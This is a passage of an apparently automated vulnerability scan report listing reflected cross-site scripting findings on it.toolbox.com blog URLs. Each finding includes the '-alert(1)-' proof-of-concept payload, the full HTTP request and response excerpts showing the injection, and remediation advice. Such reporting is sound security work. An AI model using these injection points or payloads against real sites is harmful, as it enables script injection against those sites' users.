The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b7181'-alert(1)-'56eb5abc328 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /blogs/ppmtoday/elementary-school-and-saas-38160?b7181'-alert(1)-'56eb5abc328=1 HTTP/1.1
Host: it.toolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=53162736.1296053390.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|26A01A3D851D2B4A-60000137A054F13C[CE]; s_sq=%5B%5BB%5D%5D; __utma=53162736.2076394333.1296053390.1296053390.1296053390.1; __utmc=53162736; __utmb=53162736;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 70424
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: iNa=is=0&cc=- &st=-&ct=-&pc=- &lt=0&lo=0; domain=.toolbox.com; expires=Tue, 26-Apr-2011 13:47:15 GMT; path=/
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:47:14 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   Elementary
...[SNIP]...
Clicked)
{
ctaBtnClicked = sender;
ctaDtClicked = new Date();
    var myUrl = 'http%3a%2f%2fit.toolbox.com%2fblogs%2fentry.aspx%3fslug%3dppmtoday%26i%3d38160%26b7181'-alert(1)-'56eb5abc328%3d1';
    ckUrl = 'http://it.toolbox.com/api/ctatools/CreateCookie.aspx?CTAPage=' + myUrl + '&CTA=' + ctaName;
   
    document.getElementById('ctaimage').src = ckUrl;

...[SNIP]...

3.55. http://it.toolbox.com/blogs/ppmtoday/it-starts-with-data-40018 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://it.toolbox.com
Path:   /blogs/ppmtoday/it-starts-with-data-40018

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e4612'-alert(1)-'0963bd1ab64 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /blogs/ppmtoday/e4612'-alert(1)-'0963bd1ab64 HTTP/1.1
Host: it.toolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=53162736.1296053390.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|26A01A3D851D2B4A-60000137A054F13C[CE]; s_sq=%5B%5BB%5D%5D; __utma=53162736.2076394333.1296053390.1296053390.1296053390.1; __utmc=53162736; __utmb=53162736;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 63834
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:47:14 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   Future Stat
...[SNIP]...
!= ctaBtnClicked)
{
ctaBtnClicked = sender;
ctaDtClicked = new Date();
    var myUrl = 'http%3a%2f%2fit.toolbox.com%2fblogs%2fBlogMain.aspx%3fslug%3dppmtoday%26e4612'-alert(1)-'0963bd1ab64';
    ckUrl = 'http://it.toolbox.com/api/ctatools/CreateCookie.aspx?CTAPage=' + myUrl + '&CTA=' + ctaName;
   
    document.getElementById('ctaimage').src = ckUrl;
// G
...[SNIP]...

3.56. http://it.toolbox.com/blogs/ppmtoday/it-starts-with-data-40018 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://it.toolbox.com
Path:   /blogs/ppmtoday/it-starts-with-data-40018

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 58a79'-alert(1)-'14647d4667a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /blogs/ppmtoday/it-starts-with-data-40018?58a79'-alert(1)-'14647d4667a=1 HTTP/1.1
Host: it.toolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=53162736.1296053390.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|26A01A3D851D2B4A-60000137A054F13C[CE]; s_sq=%5B%5BB%5D%5D; __utma=53162736.2076394333.1296053390.1296053390.1296053390.1; __utmc=53162736; __utmb=53162736;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 73100
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: iNa=is=0&cc=- &st=-&ct=-&pc=- &lt=0&lo=0; domain=.toolbox.com; expires=Tue, 26-Apr-2011 13:46:37 GMT; path=/
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:46:37 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   It Starts W
...[SNIP]...
Clicked)
{
ctaBtnClicked = sender;
ctaDtClicked = new Date();
    var myUrl = 'http%3a%2f%2fit.toolbox.com%2fblogs%2fentry.aspx%3fslug%3dppmtoday%26i%3d40018%2658a79'-alert(1)-'14647d4667a%3d1';
    ckUrl = 'http://it.toolbox.com/api/ctatools/CreateCookie.aspx?CTAPage=' + myUrl + '&CTA=' + ctaName;
   
    document.getElementById('ctaimage').src = ckUrl;

...[SNIP]...

3.57. http://it.toolbox.com/blogs/ppmtoday/key-success-factorswho-needs-em-42168 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://it.toolbox.com
Path:   /blogs/ppmtoday/key-success-factorswho-needs-em-42168

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 994fe'-alert(1)-'a2173915a6a was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /blogs/ppmtoday/994fe'-alert(1)-'a2173915a6a HTTP/1.1
Host: it.toolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=53162736.1296053390.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|26A01A3D851D2B4A-60000137A054F13C[CE]; s_sq=%5B%5BB%5D%5D; __utma=53162736.2076394333.1296053390.1296053390.1296053390.1; __utmc=53162736; __utmb=53162736;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 63838
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:46:09 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   Future Stat
...[SNIP]...
!= ctaBtnClicked)
{
ctaBtnClicked = sender;
ctaDtClicked = new Date();
    var myUrl = 'http%3a%2f%2fit.toolbox.com%2fblogs%2fBlogMain.aspx%3fslug%3dppmtoday%26994fe'-alert(1)-'a2173915a6a';
    ckUrl = 'http://it.toolbox.com/api/ctatools/CreateCookie.aspx?CTAPage=' + myUrl + '&CTA=' + ctaName;
   
    document.getElementById('ctaimage').src = ckUrl;
// G
...[SNIP]...

3.58. http://it.toolbox.com/blogs/ppmtoday/key-success-factorswho-needs-em-42168 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://it.toolbox.com
Path:   /blogs/ppmtoday/key-success-factorswho-needs-em-42168

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f41c0'-alert(1)-'48b85824530 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /blogs/ppmtoday/key-success-factorswho-needs-em-42168?f41c0'-alert(1)-'48b85824530=1 HTTP/1.1
Host: it.toolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=53162736.1296053390.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|26A01A3D851D2B4A-60000137A054F13C[CE]; s_sq=%5B%5BB%5D%5D; __utma=53162736.2076394333.1296053390.1296053390.1296053390.1; __utmc=53162736; __utmb=53162736;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 72848
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: iNa=is=0&cc=- &st=-&ct=-&pc=- &lt=0&lo=0; domain=.toolbox.com; expires=Tue, 26-Apr-2011 13:45:34 GMT; path=/
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:45:33 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   Key Success
...[SNIP]...
Clicked)
{
ctaBtnClicked = sender;
ctaDtClicked = new Date();
    var myUrl = 'http%3a%2f%2fit.toolbox.com%2fblogs%2fentry.aspx%3fslug%3dppmtoday%26i%3d42168%26f41c0'-alert(1)-'48b85824530%3d1';
    ckUrl = 'http://it.toolbox.com/api/ctatools/CreateCookie.aspx?CTAPage=' + myUrl + '&CTA=' + ctaName;
   
    document.getElementById('ctaimage').src = ckUrl;

...[SNIP]...

3.59. http://it.toolbox.com/blogs/ppmtoday/life-cycles-40815 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://it.toolbox.com
Path:   /blogs/ppmtoday/life-cycles-40815

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b9924'-alert(1)-'aace0a2e612 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /blogs/ppmtoday/b9924'-alert(1)-'aace0a2e612 HTTP/1.1
Host: it.toolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=53162736.1296053390.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|26A01A3D851D2B4A-60000137A054F13C[CE]; s_sq=%5B%5BB%5D%5D; __utma=53162736.2076394333.1296053390.1296053390.1296053390.1; __utmc=53162736; __utmb=53162736;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 63836
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:46:12 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   Future Stat
...[SNIP]...
!= ctaBtnClicked)
{
ctaBtnClicked = sender;
ctaDtClicked = new Date();
    var myUrl = 'http%3a%2f%2fit.toolbox.com%2fblogs%2fBlogMain.aspx%3fslug%3dppmtoday%26b9924'-alert(1)-'aace0a2e612';
    ckUrl = 'http://it.toolbox.com/api/ctatools/CreateCookie.aspx?CTAPage=' + myUrl + '&CTA=' + ctaName;
   
    document.getElementById('ctaimage').src = ckUrl;
// G
...[SNIP]...

3.60. http://it.toolbox.com/blogs/ppmtoday/life-cycles-40815 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://it.toolbox.com
Path:   /blogs/ppmtoday/life-cycles-40815

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 60204'-alert(1)-'ba784fcf1d3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /blogs/ppmtoday/life-cycles-40815?60204'-alert(1)-'ba784fcf1d3=1 HTTP/1.1
Host: it.toolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=53162736.1296053390.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|26A01A3D851D2B4A-60000137A054F13C[CE]; s_sq=%5B%5BB%5D%5D; __utma=53162736.2076394333.1296053390.1296053390.1296053390.1; __utmc=53162736; __utmb=53162736;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 68422
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: iNa=is=0&cc=- &st=-&ct=-&pc=- &lt=0&lo=0; domain=.toolbox.com; expires=Tue, 26-Apr-2011 13:45:36 GMT; path=/
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:45:36 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   Life Cycles
...[SNIP]...
Clicked)
{
ctaBtnClicked = sender;
ctaDtClicked = new Date();
    var myUrl = 'http%3a%2f%2fit.toolbox.com%2fblogs%2fentry.aspx%3fslug%3dppmtoday%26i%3d40815%2660204'-alert(1)-'ba784fcf1d3%3d1';
    ckUrl = 'http://it.toolbox.com/api/ctatools/CreateCookie.aspx?CTAPage=' + myUrl + '&CTA=' + ctaName;
   
    document.getElementById('ctaimage').src = ckUrl;

...[SNIP]...

3.61. http://it.toolbox.com/blogs/ppmtoday/making-the-case-43129 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://it.toolbox.com
Path:   /blogs/ppmtoday/making-the-case-43129

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a4b2d'-alert(1)-'86aa45cbdf4 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /blogs/ppmtoday/a4b2d'-alert(1)-'86aa45cbdf4 HTTP/1.1
Host: it.toolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=53162736.1296053390.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|26A01A3D851D2B4A-60000137A054F13C[CE]; s_sq=%5B%5BB%5D%5D; __utma=53162736.2076394333.1296053390.1296053390.1296053390.1; __utmc=53162736; __utmb=53162736;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 63836
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:46:06 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   Future Stat
...[SNIP]...
!= ctaBtnClicked)
{
ctaBtnClicked = sender;
ctaDtClicked = new Date();
    var myUrl = 'http%3a%2f%2fit.toolbox.com%2fblogs%2fBlogMain.aspx%3fslug%3dppmtoday%26a4b2d'-alert(1)-'86aa45cbdf4';
    ckUrl = 'http://it.toolbox.com/api/ctatools/CreateCookie.aspx?CTAPage=' + myUrl + '&CTA=' + ctaName;
   
    document.getElementById('ctaimage').src = ckUrl;
// G
...[SNIP]...

3.62. http://it.toolbox.com/blogs/ppmtoday/making-the-case-43129 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://it.toolbox.com
Path:   /blogs/ppmtoday/making-the-case-43129

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c45be'-alert(1)-'37141b736fd was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /blogs/ppmtoday/making-the-case-43129?c45be'-alert(1)-'37141b736fd=1 HTTP/1.1
Host: it.toolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=53162736.1296053390.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|26A01A3D851D2B4A-60000137A054F13C[CE]; s_sq=%5B%5BB%5D%5D; __utma=53162736.2076394333.1296053390.1296053390.1296053390.1; __utmc=53162736; __utmb=53162736;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 74108
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: iNa=is=0&cc=- &st=-&ct=-&pc=- &lt=0&lo=0; domain=.toolbox.com; expires=Tue, 26-Apr-2011 13:45:27 GMT; path=/
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:45:27 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   Making The
...[SNIP]...
Clicked)
{
ctaBtnClicked = sender;
ctaDtClicked = new Date();
    var myUrl = 'http%3a%2f%2fit.toolbox.com%2fblogs%2fentry.aspx%3fslug%3dppmtoday%26i%3d43129%26c45be'-alert(1)-'37141b736fd%3d1';
    ckUrl = 'http://it.toolbox.com/api/ctatools/CreateCookie.aspx?CTAPage=' + myUrl + '&CTA=' + ctaName;
   
    document.getElementById('ctaimage').src = ckUrl;

...[SNIP]...

3.63. http://it.toolbox.com/blogs/ppmtoday/micracle-free-37832 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://it.toolbox.com
Path:   /blogs/ppmtoday/micracle-free-37832

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 777b4'-alert(1)-'63cc4e8ea0d was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /blogs/ppmtoday/777b4'-alert(1)-'63cc4e8ea0d HTTP/1.1
Host: it.toolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=53162736.1296053390.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|26A01A3D851D2B4A-60000137A054F13C[CE]; s_sq=%5B%5BB%5D%5D; __utma=53162736.2076394333.1296053390.1296053390.1296053390.1; __utmc=53162736; __utmb=53162736;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 63838
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:47:45 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   Future Stat
...[SNIP]...
!= ctaBtnClicked)
{
ctaBtnClicked = sender;
ctaDtClicked = new Date();
    var myUrl = 'http%3a%2f%2fit.toolbox.com%2fblogs%2fBlogMain.aspx%3fslug%3dppmtoday%26777b4'-alert(1)-'63cc4e8ea0d';
    ckUrl = 'http://it.toolbox.com/api/ctatools/CreateCookie.aspx?CTAPage=' + myUrl + '&CTA=' + ctaName;
   
    document.getElementById('ctaimage').src = ckUrl;
// G
...[SNIP]...

3.64. http://it.toolbox.com/blogs/ppmtoday/micracle-free-37832 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://it.toolbox.com
Path:   /blogs/ppmtoday/micracle-free-37832

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ce550'-alert(1)-'0fbcb25a578 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /blogs/ppmtoday/micracle-free-37832?ce550'-alert(1)-'0fbcb25a578=1 HTTP/1.1
Host: it.toolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=53162736.1296053390.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|26A01A3D851D2B4A-60000137A054F13C[CE]; s_sq=%5B%5BB%5D%5D; __utma=53162736.2076394333.1296053390.1296053390.1296053390.1; __utmc=53162736; __utmb=53162736;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 67082
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: iNa=is=0&cc=- &st=-&ct=-&pc=- &lt=0&lo=0; domain=.toolbox.com; expires=Tue, 26-Apr-2011 13:47:13 GMT; path=/
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:47:13 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   Micracle Fr
...[SNIP]...
Clicked)
{
ctaBtnClicked = sender;
ctaDtClicked = new Date();
    var myUrl = 'http%3a%2f%2fit.toolbox.com%2fblogs%2fentry.aspx%3fslug%3dppmtoday%26i%3d37832%26ce550'-alert(1)-'0fbcb25a578%3d1';
    ckUrl = 'http://it.toolbox.com/api/ctatools/CreateCookie.aspx?CTAPage=' + myUrl + '&CTA=' + ctaName;
   
    document.getElementById('ctaimage').src = ckUrl;

...[SNIP]...

3.65. http://it.toolbox.com/blogs/ppmtoday/monthly/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://it.toolbox.com
Path:   /blogs/ppmtoday/monthly/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c2ea6'-alert(1)-'fc63506364d was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /blogs/ppmtoday/monthlyc2ea6'-alert(1)-'fc63506364d/ HTTP/1.1
Host: it.toolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=53162736.1296053390.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|26A01A3D851D2B4A-60000137A054F13C[CE]; s_sq=%5B%5BB%5D%5D; __utma=53162736.2076394333.1296053390.1296053390.1296053390.1; __utmc=53162736; __utmb=53162736;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 50697
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:45:29 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   Future Stat
...[SNIP]...
!= ctaBtnClicked)
{
ctaBtnClicked = sender;
ctaDtClicked = new Date();
    var myUrl = 'http%3a%2f%2fit.toolbox.com%2fblogs%2fmonthly.aspx%3fslug%3dppmtoday%26c2ea6'-alert(1)-'fc63506364d%2f';
    ckUrl = 'http://it.toolbox.com/api/ctatools/CreateCookie.aspx?CTAPage=' + myUrl + '&CTA=' + ctaName;
   
    document.getElementById('ctaimage').src = ckUrl;
/
...[SNIP]...

3.66. http://it.toolbox.com/blogs/ppmtoday/monthly/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://it.toolbox.com
Path:   /blogs/ppmtoday/monthly/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 42927'-alert(1)-'e300d722da6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /blogs/ppmtoday/monthly/?42927'-alert(1)-'e300d722da6=1 HTTP/1.1
Host: it.toolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=53162736.1296053390.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|26A01A3D851D2B4A-60000137A054F13C[CE]; s_sq=%5B%5BB%5D%5D; __utma=53162736.2076394333.1296053390.1296053390.1296053390.1; __utmc=53162736; __utmb=53162736;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 50589
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:45:04 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   Future Stat
...[SNIP]...
!= ctaBtnClicked)
{
ctaBtnClicked = sender;
ctaDtClicked = new Date();
    var myUrl = 'http%3a%2f%2fit.toolbox.com%2fblogs%2fmonthly.aspx%3fslug%3dppmtoday%2642927'-alert(1)-'e300d722da6%3d1';
    ckUrl = 'http://it.toolbox.com/api/ctatools/CreateCookie.aspx?CTAPage=' + myUrl + '&CTA=' + ctaName;
   
    document.getElementById('ctaimage').src = ckUrl;

...[SNIP]...

